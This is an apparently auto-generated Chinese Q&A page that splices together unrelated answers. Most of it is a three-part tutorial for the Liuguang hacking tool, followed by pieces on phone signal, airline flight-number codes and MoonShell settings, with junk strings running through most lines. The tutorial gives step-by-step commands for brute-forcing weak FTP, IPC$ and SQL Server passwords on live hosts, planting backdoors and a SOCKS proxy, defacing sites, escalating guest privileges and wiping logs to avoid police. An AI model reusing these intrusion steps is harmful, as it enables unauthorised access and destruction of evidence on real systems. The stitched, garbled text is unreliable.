3ehnt怎么用 3EHNT
02-09     浏览量:365
本篇文章给大家谈谈3ehnt怎么用,以及3EHNT对应的知识点,希望对各位有所帮助。
本文目录一览:
1、请问流光怎么用
2、为什么这几天网络不稳定
3、怎样通过航班号看是那个航空公司的?
4、moonshl怎么用
5、鸿胪读音胪怎么读,拼写出来
6、won't怎么读
请问流光怎么用
流光教程
流光教程一 ON,Z$G*^ m*U
许多新人在用流光的时候不知道如何下手,小榕论坛来讨论的也多是“如何添加用户”这样的初级问题 :),就抽了点时间写这个简单的教程,希望让新手快速入门。 $Xn3l Ee M'fl7I
h4r3|)V"Sy
我个人认为流光的破解可分为5大部分: #?c"J4l'uL;Mum
nZX'vd;E3D4{+A6g 一、POP3/FTP/…探测
Y D Z"Aw9e
N z*l6A8nuxjAZ 二、IPC探测
+v8} ]2i X r3{V ~7cNNZi:W2u
三、SQL探测
0b*[1x8g'U #}??}8Hx8O
四、高级扫描 4v`I'\ D\Z
?\)r+x!e-q)j bf
五、其它 … 9FZ%J-tE6c(}+N8v
Q H^@4VX'p 因为开发时间的原因,上面的探测模式略有不同,所以分成了四个部分,本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了:) Z:X%?#a+y AV
6JO v+] f9jS,m x 下面我就简单说一下基本的破解流程: $~S @O%r2D
z|+|)qsq BC 1、你得有流光,我这里试验用的是流光2001.FOR Win98 中文版.FOR Win2000的也可以。 nQ4]v-Az9NCD*_7G
Q a:x7c.Kf4u 首次启动流光,看到如下图的界面: :x2jWr0nJ+x
"d)zkP!\ h$a ]|Q0uro
X-U9[zO"k;M
首次使用是要注册的,不过不要想到花钱:),小榕只是想看看有多少人用他的流光而已。你可以填好相应的选项,然后点发送即可,如果发送失败,你把发送服务器换个就好了。
1Dy*^7CM4y4jj7BA )[sRpa7_/w
S;X j@_H
E+U4xtR:@5EYt/CJ)}
因为重装系统,我也不知道我发了多少次了 :( 。如果不想注册,就稍等下面的进度条走完,点稍后即可。如上图:
y\Bs9Np9~9f%Ol`9F F5OGX-X?3c@U9L
tN;FQDgH-x -s(Z5w5FEr@p[
H9ed$^"N[*P"X .A$}Vtx6q2sJ
2、找个站点,我选的是中华网[url][/url]的主页空间(home4u.china.com),探测方式:FTP。
N |B^Fk4Y +I V+X lf
有人常问扫描端口有什么用,其实作用就是你知道他提供了什么服务,然后可以采取相应的探测方式来获得PASS了:)我们知道主页几乎都用的FTP上传,我们这次就用来测试一堆用户名,看看有没有弱智的密码,呵呵,如果有 hacker.at.china.com 这样的,也不妨霸占为己有:)
4n9N OnqZkd
7W NmEQ5ZHw 3、加入要破解的站点名称:右键单击FTP主机→编辑→添加→输入 home4u.china.com →确定! \:] B E'MGw
mZy9yF:qpE8K eJ5L!I a#C4I1O*w
yUCX#X$x,r
CrN Ap
!zS,@}0m/P,V7} 4、加入用户名:我们要破解的是一堆用户名,所以要加入用户名的列表文件!我们就加入流光目录下的 Name.dic :)右键单击刚才添加的主机:home4u.china.com → 编辑 → 从列表中添加 → Name.dic → 打开
;g$d.k H-W 5itXRHu%?8G
7_bvg'fU
C@2H W,]S NO%yOw-Y.\*E x hJkB6l
1l;v0{`!~d+e%hU u
然后会有“用户已存在列表中”的提示,我们选中“不再提示” → 确定 。如下图: 6A ~:uu X3eh
$G7Z%~ nw
wVF5^tB#yT#k%Nf7c
CkjR-X[_@-b 用户名太多,我们可以用点主机前面的“—”号把用户列表缩起来,如下图:
+l3^8TC0R3Ml
7Q,FP oe`"[mk Z-m1x^kB8j$Ej]
!V8WoCEr
大家注意名字前面的小框中必须有√要是没有就无法探测了。 Xcj)[ PR
\JL,X5W Cv Lv o3G
5、有了用户名,我们就可以进行探测了,大家会想到怎么不用密码?其实流光有个简单模式的探测,也就是用内置的密码”:“123456”和“用户名”来进行探测,因为这样的密码是使用频率最高的:) 9r)?e b;M4Y5y#pixy
{M JrO#j@Hmg_ 当然你可以修改这个简单模式的文件,加入你认为弱智的密码。方法是:单击 工具菜单 → 模式文件设定 → 简单模式探测设置文件 → 加入你要加入的密码 → 把设置文件存盘! OQhI^,O
F Q_~.k ODI 下面我们就来看看这一堆名字里面有多少是用“123456”和“自己名字”来作为密码的。
}S~5M{)E
EbUz RqHZ 探测 → 简单模式探测!
u$b'n(jR,Ik0h@
b(P*|@-s,U!P;uO.{ hm.T2l*t},|
T ]qI2q~
3F_(W(C j?\
M s+q O3L$s 探测中…
:fJ+A;T@S}u
y+g.Bl C-_6x"U@X+M1]B
$k.S*q!g.] X
K]e/y^Ii
:]^YE/A$fB#W
1M+]t+eW QAM 6、探测完毕,也看到结果了,流光会问我们是否查看入侵检测报告,不想看可以选否。
*sQ!cR:C'oms
;w I`x+y
|I)vh7?xc|
;Hga+B5r:vt#Je 报告的画面
2z)S"nS @l4~#VM
ydx!w*O b| {?Cb1ZDZ
\.i c`h xc 7、如果要探测的是一个用户名,就需要添加字典、或者密码方案。方法是:右键单击解码字典或方案 → 编辑 → 添加 → 选择一个密码档即可。 ]}E5? J l/@
J$``IO#R3i 以上就是流光的一次简单的探测了,事实上这些功能只能算是流光的2.5版的功能,流光2001增加的IPC/SQL/高级扫描等功能,使流光更加强大。如果你对这个已经很熟悉了,相信你看流光的HELP就会很快的学会其它的使用方法的。
9\W i R-JUV j {L k/X |
关于用户名的问题:有人觉得自己加入的用户名不一定存在,如果不存在岂不是白费了力气?这点你大可以放心,流光会进行验证的。而且现在注册的用户入数之多,想个没有的名字都难,不信你随便敲个试试。
Vi~PLWdY UYk5@Ou
关于字典的问题:流光可以使用字典方案来探测,当然你也可以生成字典,有的新手在作练习的时候不知道怎么做,你也可以用记事本生成,每行输入一个密码,存盘后将扩展名改称.DIC,流光就认出来了:)如果你连扩展名都不会改 :( 那……
wp-w7J"Ga)\af+p
L/\Di/`@y X#c
2a2H~/f9W[,L o r @m F ~
只要是学习、谁都会遇到困难,我也是问题多多,还得向小榕、EKIN讨教,欢迎大家多交流 :)
]J+|3{,mJ-k#j!M
0W H%X$sp/@ a
u3I4L%S9n btd
P#m)Zqs
`1_s"W)BD :c"{n_r]
待续……
香烟 2007-5-28 11:07
流光教程二
很长时间也没有写什么东西了,这源于我的懒惰和生活缺乏激情。我的记事本上一大篇都是欠朋友的承诺 :(
l P8M"F5M:b2|0k !J:Ix~R h
你既然看到这儿了,就在听我牢骚几句吧:)搞安全应该有正确的心态,别以为你会了个工具使用就可以一步登天。
{B \[y0x\/u 'a+g a S)tUc
交流、学习才是最重要的,把自己心态放正,无论我们是高还是低。
R p4O)Z'qT#L n.Wxu3Zk0x
5F i GX!xJL+Z#`dN
今天要写的是流光的IPC探测: \,`;P_`?
Ev b n+jq 一、目的和任务: +@g2Bs/dp+i
M UA0P@ O;t pu!?DP
1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。
V |nnP;_gTX] 2、学习IPC探测的相关知识。
!gnaW4v,Ft9~ 4X-R0J'U:\ |td
二、探测流程:
E],@9y/b Bm#a~ S8HD#?%X
1、你得有流光,我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/
X.Q#mG"Vj^S }+T!J (U:s,o|P1F\I2p
2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则流光启动会失败!
+DfdoX;})J (~\Q.` v \|7\3o
什么是IPC:
l2E6WK0@4b^
d,d-Txkrx!miLM IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。 .p gsh Y_E
S#M+Y+c^+\_|
IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。 (nV6s7f4k
RE u*@!T 注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。 g/?"o[;We AvE w
2\"D,R+t6u;z $s e5mP6@^5v7t
:s#n8[q4rA g
可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 …
#p"U`9F9v8lv,P
xK8X$rAm k{8K*G7q5R
2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC
sI)[at
M9ly3t p 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得 A:q6EkB5_v
nLa5Q*pxL
到弱口令)。
"S[;hr4]W)@
9Q$?5X4w(a 在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。
u ~ ]` W6C 图main1 4H%SmP u3`-g
7\0v7S7S^ue
+k.h]7}vr4A*| "B^;XKZ0L;R"_-H
图main2 Qmm _ Lh7GV
-XCq2S~ cQ
EG"miTgi+u
6N5_Vp!Y0@ws0r,E 3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机 k3P.gQ$p
.ZA F#w X 4、探测中…… (start1) %_,sn#G;q3Y`
!Gv?@G;t0|1t_D
(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样) 6rb2ZLn9n'?3F
M.KoJ2c
!dnP6me;D%C iCBt)hvs!bm)v
6e(JmneR 5、这是扫描到的NT/98主机列表:(jg1) 9yd R9V @c E G
4z zC1Kn9GOP ?
1sa _W Om9l
'U0x?U mk ^2G5j
6、没有扫描到常用密码:(
2\"r'i'kAn;o 6KgORI"y t}-T$J
HfegS j c,o9v*LQ)K:F
7、就不要查看报告了 :… e2N(Ki,t \WM@FO
} z'p-S%yYu4W
WU9g._w/S5A
\:kr_8_7gA)A 8、有了不少NT/98的机器了,正式开始IPC$探测:IPC$主机-探测-探测所有IPC$用户列表。 $P8E]3\9B K2pg
AP#[(N W5P4Y
%n)T h9qO[k"U3y P Xe
)g2tM"l-^)A.s8N} 9、注意下面两个对话框的设置:全选上,我们只要IPC$管理员的弱口令。然后点选项
Y i:~C{DP Nzy _x3wxL
(C0M4X W@vO
"mx-?qz]%n4z 10、点“选项” :为了加快弱口令扫描速度,这里的两个我们可以全部取消,比如下面的那个,如果对方禁止列出用户了,我想对于一个网管来说,弱口令可能性也是微乎其微。 T1@+Z\q _'xbU
3U+n)L1?1ZHE0E
?]*\9K5\6{4o2{3a l8_W
-~K+d6^]%w mg x1_fw[
11、探测中……
L|9Wl/`9i!w
iX5~o5y"E C+@ /l8f#OxW:@Q
FL?HKg/vQ
12、有密码了:) vh3tv/zll,p
xm;{Z r+L3{~"k
y1pg2x l z:P l(f6y2[2vSY;K,]
13、又出现了查看报告的窗口,看看 :)
#Y0U fH M@,@Tf x
@^%Z0v(t [| 9m-`)X-P(Q#o,I
C8E [,F W
14、有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办法么? :)有的是 !自己看看工具- i:h0{(AGCO5O
H.j+f!X;Fp8o 菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。
}6Pb \+u W#C %V%`*@$m*u"pHP
15、黑了他 !
w2K#cu"e}
@2]*w5d.Y+V'D8bB 开个dos prompt 执行如下命令,本次用的例子如下图。
1v'kePX4a-r
)z9N,s5hb-AaH_ 1、 net use file://对方ip/ipc$ "密码" /user:"用户名" || 建立远程连接
6sBdD1z3l p#T(o_p5ve+PSqC
2、 copy icmd.exe file://对方ip/admin$ || admin$是对方的winnt目录 :) 这里文件多。
*Q1T*l,e"K%_/E
-Pr:z%mOn/L 3、 net time file://对方IP/ || 看看对方的本地时间
{7J{ H.|:f!oy Q\M
R g;Yi}x+tO1j_ 4、at file://对方ip/ 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。
Luw UB @)L2~fy S0@lz
5、 telnet 对方ip 端口 || 1QLR1Z3W/h }
{K9x J4s-U(K%C-_*c
6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) ||
8Hv3k?)um1o@~`[ QF@G~%gZ8jF
7、在开个窗口,继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe 1p"?+X1LN$K~4k
za1\5E[:?:j5f
图cmd1
-MRgW,~F/cx
q\Vh |,P #on8N/R` l%RB
9O2i,ZZ ~/~,b kA%c4f-h!v Q 图cmd2
Nl#I\*s E V
Ui HR"C%X
;L;\#~A-g])_$o
Z(G;iiC 如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:\interpub\wwwroot\ .
%\YUsC5z2th2w j2WwPs*C:@
假如首页文件是default.htm并且在c:\interpub\wwwroot,这样:copy default.htm \\ip\c$\interpub\wwwroot n{*{]4W0F4W#M
_s8c8P\B K
下面的图有演示 t2~5l:i'v,j
.T'l!h)XGK_-FN^ 7、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点:) /S.S,_? ^"L-y
FD(HL ^ 执行我们copy 过去的ntlm.exe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西 :)
Gk,Q@ X"n\m us E
} ^\W(a G V,S
Y1aU j9t ^/n[7K
6Z`!q!Dx-W\ 8、做个SOCK5代理玩玩,用在QQ上不错喔: cqQ `k+h8m
1G1}lX'S(F
执行我们copy 过去的sock -install,net start skserver 看看用在QQ上的效果:)
1C.P7F6?"mY
[7Dnl|@
*b wh ?}1O/SW
0s(r2G:K9_A\kB/iw 是不是没有看清上面的步骤呢? \$u1Ll]qJ,\Q(e
1QG2S/zq4_0DK wN 下面是我telnet 上去后所有的命令:)
M)M k|.Z $me*bZRZr
0c0Zw8X7}I
$pF g1^.A 9、还能做成其他的么 ? yLP4s#w"\5i4|
/}2}H6h!jc/|o;A
当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿 :)
Ab!W2`My^#v
5Lj} O`qG 10、日志清除,断开连接 : dB#Va F~w f
"x)Op(r[`9D
执行我们copy 过去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use /delete
FNwL3v
4J$lx'Xztp 这步我认为是必需的,尤其是在一些有争议的站点上,或者是国内的站点,除非你想让电视上报导XXX地区我神勇刑警捕获弱智黑客一名XXX。 'rKIh8G V(V
$Ftj+\W6f
在网吧写完 :( 错误之处请赐教。 ,f^#B#yg3u J#q
u;Y/q~3hN A~ 只要是学习、谁都会遇到困难,我也是问题多多,还得向小榕、EKIN讨教,欢迎大家多交流 :)
香烟 2007-5-28 11:08
流光教程三
关于IPC$的终于写完了,那个该死的网吧,闹哄哄的声音声声入耳 :(,你可能想不出,IPC$探测是我在网吧完成的,而且那个网吧还有公安部门的网络监视器,这东西很有意思,好像是VXD调用,和IE运行库集成到一起的。哪天非弄来研究一下,说不定一款别具特色的木马就问世了 :) PY{ S+Fy!Yo
%J@2J!QlVW7u;A
不知道你看完前一个教程有没有要扁我的想法。。。。
zv'y;w,\!msU
R7dr8gLWpd 交流、学习才是最重要的,把自己心态放正,无论我们是高还是低。 jN;d|C c%|]
\#O"o7Nd
+ER[ x`v'r 今天要写的是流光的SQL探测,顺便说说ipc$补遗和其它的探测手段。
sI!\~*F3~
hmw.N Eer-Ca+t 一、目的和任务: 1Z%CUh!v:@i DZ
/]a E)Z4G#].e
1、用流光的SQL探测获得一台NT主机的管理权限。 dU/[-d9JI'k
2、学习SQL探测的相关知识。
^q$f5F k o;d qJ 3、IPC$补遗和其它…
$n j6n$V yl 二、探测流程: ,y?8gzw)l
,F7ajG@:[ 1、你得有流光,这话不用在说了吧:) rcHFO4w|C
Ny|f\X
什么是SQL:
2?Ek\+Z0G"E \;f"n0Y0? x+F^]6~ H9r
SQL:微软开发的数据库,专门用在微软的OS上,功能类似Linux 下的Mysql,晕……,到底谁类似谁啊?有时间
7K$e.k Jbp (wi4PW6s9pU8e/C*H
去看看SQL的联机手册,说的很明白。
W8A4of)?)t)U
'?c3QW@.k#Dh@*Ll SQL服务程序支持的网络协议: Nl*`yf ?
.G0y)?F,R$`rH Named pipes :使用NT SMB端口来进行通信,存在被SNIFFER截获数据的危险。
YB5I7`ME E9v4D
-If}ru \ IP Sockets :默认状态下开1433端口,可以被扫描器探测,存在被SNIFFER截获数据的危险。
:b3L{~-S Xl6}E!]2c o3C]
Multi-Protocol :客户端需要支持NT RPCs,数据加密。 4T7f3e?{1`[a
JJq(S:o9`\,nk
NWLink :存在被SNIFFER截获数据的危险。 5{/AhH3_F jv*LM
%^3qxM8h:\qZ `W!y!m
AppleTalk (ADSP):存在被SNIFFER截获数据的危险 v"t3N"e DZx
7y3r KD UkGZW@ Banyan Vines :存在被SNIFFER截获数据的危险 :t k6Z7RZ;W~
Bkh{3_/y9k7D p
在Internet上,95%以上的SQL Server 采用的都是IP Sockets协议,流光探测的就是这个协议默认的1433端口
;MA'vxIjn.L"V7E
([Z8u)b[1N)l[xjf
vI'Go'}dF E q.j 2、我们要获得SQL 主机的管理权限,那么还用命中率高的办法来探测了(测试一堆IP来得到弱口令)。
Hz W2VB"Pq
.~8U6@/\?H:{ 对一台固定主机的探测等我下期的教程:) WUTp!~-M:K
s)XZh4Lz
在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。 ~F)_2mc1J!_2k3o T%@
图main g;S:]_4M$^
)[MQp j
V_0@sF~
$yX0tZ;TX'l(u(b
I0i)Q2cu2iv/ul
3、出先了下面的小窗口,输入我们要破解的IP段,我们输入了来看看。(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现“地址保留的信息”)
iO~/qo|p4\ 图inputip
@,l6S/mi6p ,S4^XK-rb
W7i}tF,?` H B j1jWF:~|;MV
%{]-Y;`(wR-[cn 4、探测中……
5hB-u.aXGA Xb
bm!hl]-Kn|1F5B 5、有密码了:) 图psss 1→3 I*Xett-^ wY+d:N(Q
`,Te`#p` yc2EJ*i7x%|Qu'e
t:` V9^]
Ee+x-va;W ]F
6uR8p)Crk5\7?
aH0cgLClEGp9I
*{(ShN:n
2H]6I3xJ4V | ip#^/H] My-I g7Z
6、下面我们进一部获取管理员的权限。 4b.RQK4L
用SQL 客户端去连接主机,没有装SQL :( ……………… 没关系,流光自带了连接的工具,以前我一直都是用的天行的工具SQLexec,但现在可以不用它了。 A d-i9MC3O!oZ1g
R`s AB$u@A
打开菜单 工具 → MSSQL工具 → SQL远程命令看看:) f8jZ]/J
图tools
| q^%g{$H|8p6~
D~ fE/Yj'Hyy G4k#X,br(h
+sjL t+N ]j 图SQLcmd 7`;^3d4KdWt\4ir2a
@0|#Zh*I`"U
2^M*O8rLD
zL$n*Gl 4nsB*l+?X
7、获得管理权限、增加后门
s+Ex MDzj*y(N 图cmdline 6R^ {.HtkOe g
5x%G7L_ z;LM A
L0Y?2b:sy
8HNh#wk.f
0f-}8s(Z%Q gO
{9Rhd aD 8、现在我们已经是管理员了:)
3l"eM1G(e.?(U { y.M tn
以前我们是用at命令来远程运行程序,今天顺便说说流光中自带的“种植者”,看看 工具 → nt/iis工具 → 种植者,我们来用它远程启动icmd这个后门。 xW9{5d lp
4o@7Fi.O5Mt{
图lookcrop 5q l.c.nM6k
H V} g.e}_O
oS8D'lL
l e9G1a~(wy
图crop V8XM;u }\0t%_Sd
{j qEC#?Lc/W
)\$_;k,u-K
H(P1e)G;a7E 图cropend d'VHG6@yu
m*XX6A$b N fe3A9u%B]Sk
-VLFBb*N 一分钟后登陆看看:
2@'zrwIB.z b9f]V4V/Ys"q#gr2H
-L-e)L,m yQG1?c
@x3A)}U$I%k1mA
.Y,EMOF
6QNC4w6rs't
7O2l(X;TT;bQp
9、再说说 工具 → 模式文件设定 → ipc简单设置文件 。
0T:s(_)^CdaQt
3}.YUYvi)g8N 图mode U k/dbcw'e4m
Da \[ j;^2m
8eQI H3er!\$R
H-QJ/njtF#c
#v(HkA%{,I9E
@i/V5V`uo “工具”中其他的项目和上面说的两个类似,就不多说了。
:AL A"sF)g\ H2K
8{7e(z[(~0j']zF v
#Rn3O${]K"h9v NR 10、日志清除,断开连接 ,参考IPC探测,记住可以用种植者远程执行命令。
Q]d%H Q Of5b ot-m mFnM8a#Cv3A
!oSO.LF|
关于IPC$补遗:上篇对与IPC$探测的文章,写完后觉得还差点什么没有说:) T)Rlz*v#@gC
b8n2^,y}"Ui1` 1、我们虽然只探测管理员(admin)的弱口令,实际上在真正攻击中是任何一个用户口令都不会放过尝试的,因为我们获得了
E:mJ O#P0M,^EAJ !aF C??5k!qh9CH
普通用户权限后可以提升权限,事实上,一个普通用户的权限在*nix攻击中是非常重要的。 lCkc)W@m
MN0f:GT%x
2、获得口令后,攻击手法多样,不要局限于我的例程。
XJWu+Q |/U5B/Ffco
3、如果对方没有XXX怎么办?,这类的问题去看看我以前整理的流光FAQ。 v!D+RH z K
'K;t{"S(a?rM
关于其它探测:
O)},m1]u A1J
]6H {0^7C$?U 玩玩3389 ? Lxk8[l8F
Dc?~'^#mQ/c3L l
首先终端是WIN2K提供的功能,所以我们在扫描的时候就要选择 “NT/98”的主机,在得到主机列表后自定义端
4]vE0~ b/o CY
6J:XH WY{AN"qu 口来扫描这些主机的3389端口,然后……
7ED.O4CM/]NZ 8l3m-J9x'?*B
玩玩cisco路由器? Y'}L4[x-}:qt
|7l5x\;nm 自己想想怎么作 ?要是想出来了,我的以后的教程就不用看了 :)
4?` [wxXB"o/}~ y!GGM X}\(H:|'`
1_h(r5b"V1E3ht]%j
G6RK^XE-u 明白了么?我说的意思是要灵活使用流光:)
为什么这几天网络不稳定
手机网络不好是因为信号在传播过程中会受到地形、地貌、高楼等各种因素的影响,如果您所在的位置是比较封闭的地方,信号会受到影响。处理方法如下:
一、将手机重新开关机再次尝试;
二、将手机卡换到家人或朋友的手机上再次尝试;
三、看周围的其他联通用户是否有信号;
四、如无法解决网络信号问题,可联系当地的人工客服进行反馈情况。
怎样通过航班号看是那个航空公司的?
2004年,三大航空公司重组后,航班号的编制和使用方法混乱,时有航班号数字重复现象,导致陆空通话中出现误听问题。中国民航局重新制定了航班号分配和使用方案,计划2004年10月底的秋冬季航班换季时执行。
同年,中国民用航空局《关于印发《中国民航航班号分配和使用方案》的通知》,各航空公司编制新的航班号要遵循以下原则:
一、按照数字的顺序编制航班号。
二、编制国内航班号时,不得使用其它公司的航班号。
三、编制国际和地区航班号时,原则上按3位数字安排,如果3位数字不够时,可以使用分配给本公司的4位数字航班号,但不能与本公司国内的航班号重复。
四、在编制加班、包机等临时飞行航班号时,应在分配给本公司航班号的数字范围内编排,但不得与当天的定期航班航班号重复。
航空公司及其两字代码-国内航班号第一位数字:
3U 四川航空-8
8L 祥鹏航空-9
9C 春秋航空-8
BK 奥凯航空-2
CA 国航-1、4、8、9
CN 大新华航空-7
CZ 南方航空-2、3、4、6
EU 成都航空-2、6
FM 上海航空-9
G5 华夏航空-2
GS 天津航空-6、7
HO 吉祥航空-1
HU 海南航空-7
JD 首都航空-5
JR 幸福航空-1
KN 中联航-2、5
KY 昆明航空-8
MF 厦门航空-8
MU 东方航空-2、5、7、9
NS 河北航空-3
OQ 重庆航空-2
PN 西部航空-6
SC 山东航空-4、1
TV 西藏航空-9
ZH 深圳航空-9、3
扩展资料:
规律
时至今日,随着新兴航空公司和航班越来越多,很多航班号无法套用原来的规律了。虽说航班号不再有严格规律了,但也并非“无迹可寻”。
单双数结尾规律仍然不变
唯一保持不变的,是出基地的结尾单数,回基地的结尾双数这一规律。比如中国国际航空公司基地在北京,国航北京飞广州的航班号是CA1301的话,那么从广州飞回北京时航班号就是CA1302,而南方航空公司基地在广州,南航广州飞北京的航班号是CZ3101的话,回程就变更为CZ3102了。
“数字——地区”对应有迹可循
除此之外,根据“飞常准”提供的最新统计数据,在概率上,航班号的前两位数字仍与航空公司的基地位置、终点位置有一定的相关性。从航班第一、第二位数字的统计数据来看,这个“数字——地区”的规律特别对国航、南航、东航来说,仍然有迹可循。
比如国航(CA)的航班号第一位为“1”、“4”、“8”、“9”。使用“1”(即原来代表的华北基地)这个开头的航班最多,占63%。南航(CZ)的航班,“3”(即原来代表的华南基地)字最多,占53%。东航(MU)的航班,“5”(华东)字头最多,占53%。
第二位数特别字为“5”的航班,飞往华东的占多数。第二位数字为“1”的航班,飞往华北的比例最高。
航班号后加字母为补班航班
如果航班因为天气、机械故障等原因延误、备降、取消,需要补班飞行,为区分原航班和补班航班,航空公司会在航班号后面加个字母,如CZ310W。具体规则是,Z代表0,Y代表1,X代表2,以此类推:“Z0-Y1-X2-W3-V4-U5-T6-S7-R8-Q9”。
参考资料来源:百度百科-航班号
moonshl怎么用
moonshl设置说明
©EZ-FLASH论坛 -- EZ-FLASH论坛 $E
以下所有数值均为默认值。Rj
©EZ-FLASH论坛 -- EZ-FLASH论坛 }d
1.2 FileSelectSubScreen=1
文件选择屏幕设置,0为下屏,1为上屏。`
©EZ-FLASH论坛 -- EZ-FLASH论坛 -^w5
1.3 ClosedSholderButton=1Y
DS闭合时LR键的设置,0为DS闭合时LR键不可操作,1为DS闭合时i
LR键可操作(按住L键再按R键是播放下一首,按住R键再按L键是停止播放),2为无论DS是否闭合,LR都不可操作,3为无论DS是否闭合,LR键都可操作。m
©EZ-FLASH论坛 -- EZ-FLASH论坛 $g
1.4 MusicNext=29\zE
MP3播放设置,0为单曲播放完停止,1为单曲循环,2为曲目顺序播放,3为顺序播放完毕关机,4为随机播放,5为随即播放后关机,6为单曲播放完关机。)h/
©EZ-FLASH论坛 -- EZ-FLASH论坛 Mya|?v
1.5 SoundVolume=161
默认音量设置,16=100%,64=400%X
©EZ-FLASH论坛 -- EZ-FLASH论坛 @Ml
1.6 FullScreenOverlaySubScreen=1w8Q
播放DPG时屏幕设置,1为上屏,0为下屏。F
©EZ-FLASH论坛 -- EZ-FLASH论坛 i}W"
1.7 FileMaxCount=256)uEq+
系统最大显示文件数,不要改,改了后果自负!]zC
©EZ-FLASH论坛 -- EZ-FLASH论坛 z~VE
1.8 NDSLiteDefaultBrightness=4?9+Q
屏幕亮度设置,0为最暗,1为暗,2为亮,3为最亮,4为自动监测。Gb
©EZ-FLASH论坛 -- EZ-FLASH论坛 T{y
1.9 WhenPanelClose=0Nt{
DS闭合设置,0为关闭屏幕,1为关机,2为播放关机音乐后再关机。(shutdown.mp3)LQr8_
©EZ-FLASH论坛 -- EZ-FLASH论坛 (,q|
1.10 TopScreenFlip=07nMjFW
上屏画面翻转设置,0为原始,1为180度翻转,2为纵向翻转,3为横向翻转。_ZA
©EZ-FLASH论坛 -- EZ-FLASH论坛 GU*!
1.xx ResumeUsingWhileMusicPlaying=0P-Xu4
不明白。n)XQ
©EZ-FLASH论坛 -- EZ-FLASH论坛 FZ=%C%
1.xx LockLRButton=0RE7P
LR键设置,0为使用,1为不使用。i3Tt
©EZ-FLASH论坛 -- EZ-FLASH论坛 AAC
Attribute_Archive=01v
Attribute_Hidden=1X~
Attribute_System=1"K:
Attribute_Readonly=07f
Path_Shell=1Ntar
Path_Moonshl=1oB4
File_Thumbnail=1%~y
统统不明白。u3mRE
©EZ-FLASH论坛 -- EZ-FLASH论坛 2z"
3.1 DelayCount=15^
3.2 RateCount=1'
不明白。eH
©EZ-FLASH论坛 -- EZ-FLASH论坛 k
4.1WhenStandby=10*#
4.2WhenPicture=153/?E,
4.3WhenText=30!uV=
4.4WhenSound=10
背光关闭设置,从上到下分别是文件选择状态,看图片状态,看文本状态,听音乐状态,在无任何操作时关闭背光的时间,可随意填数值,单位为秒。4peCAn
©EZ-FLASH论坛 -- EZ-FLASH论坛 j
5.1hiddenAboutWindow=1H+4cH
文件相关信息窗口设置,0为显示,1为隐藏。/9v:
©EZ-FLASH论坛 -- EZ-FLASH论坛 } N
5.2hiddenHelpWindow=1B#qBr~
帮助窗口设置,0为显示,1为隐藏。tWRZ%^
©EZ-FLASH论坛 -- EZ-FLASH论坛 Pe0_q
5.3hiddenDateTimeWindow=0?"
时间日期窗口设置,0为显示,1为隐藏。zPw
©EZ-FLASH论坛 -- EZ-FLASH论坛 =@
5.4 StartupSound=1)B/lkW
启动音乐设置,0为不播放启动音乐,1为播放启动音乐,2为随机播放指定文件夹内的音乐。W
©EZ-FLASH论坛 -- EZ-FLASH论坛 mX
6.1 Mode=3GKJ1/
缩略图模式设置,0为禁用,1为只用缩略图插件,2为只用全屏预览,3为二者同时。M
©EZ-FLASH论坛 -- EZ-FLASH论坛 GL
6.2 SelectItemAlpha=16/i
选中缩略图片透明度设置,0为无效,8为半透明,16为不透明。]
©EZ-FLASH论坛 -- EZ-FLASH论坛 [{xAkp
6.3 UnselectItemAlpha=10gZi
未选中缩略图片透明度设置,0为无效,8为半透明,16为不透明。fTu
©EZ-FLASH论坛 -- EZ-FLASH论坛 C'M2@K
7.1 SpacePixel=1[]Ak
文本行间距设置,设置数值范围为1--191。m#,\
©EZ-FLASH论坛 -- EZ-FLASH论坛 JV!Uf"
7.2 ScrollType=0-jP
滚屏设置,[hk
©EZ-FLASH论坛 -- EZ-FLASH论坛 ]c
7.3 SelectDisplay=2:du0
文本显示设置,0为下屏显示,1为上屏显示,2为双屏显示。=z
©EZ-FLASH论坛 -- EZ-FLASH论坛 W
7.x TextEncode=0[*r08
文本编码设置,0为Local,1为UTF-8,2为UTF-16LE,3为UTF-16BEh1
©EZ-FLASH论坛 -- EZ-FLASH论坛 0%
8.1 CrashMeProtection=1Q9Ps5
不明白。;
©EZ-FLASH论坛 -- EZ-FLASH论坛 %NC
8.xx NDSROMBootFunctionWithEZ4SD=0Em'
不明白。j{jg
©EZ-FLASH论坛 -- EZ-FLASH论坛 (wq
9.1 Dithering=0j
不明白。$s
